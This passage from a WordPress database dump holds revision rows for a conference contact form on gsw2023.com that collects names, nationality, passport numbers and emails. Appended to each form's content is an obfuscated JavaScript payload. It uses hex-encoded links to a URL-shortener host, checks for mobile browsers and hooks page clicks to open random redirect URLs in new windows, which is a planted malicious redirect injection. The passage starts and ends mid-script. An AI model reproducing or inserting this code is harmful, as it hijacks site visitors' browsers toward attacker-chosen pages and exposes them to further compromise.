ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:50:04','2023-08-20 22:50:04','',5345,'https://gsw2023.com/?p=5352',0,'revision','',0),
(5353,1,'2023-08-20 22:50:42','2023-08-20 22:50:42','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":7,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:50:42','2023-08-20 22:50:42','',5345,'https://gsw2023.com/?p=5353',0,'revision','',0),
(5354,1,'2023-08-20 22:51:52','2023-08-20 22:51:52','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"text\",\"label\":\"Hotel accommodation in Cairo\",\"description\":\"\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":8,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 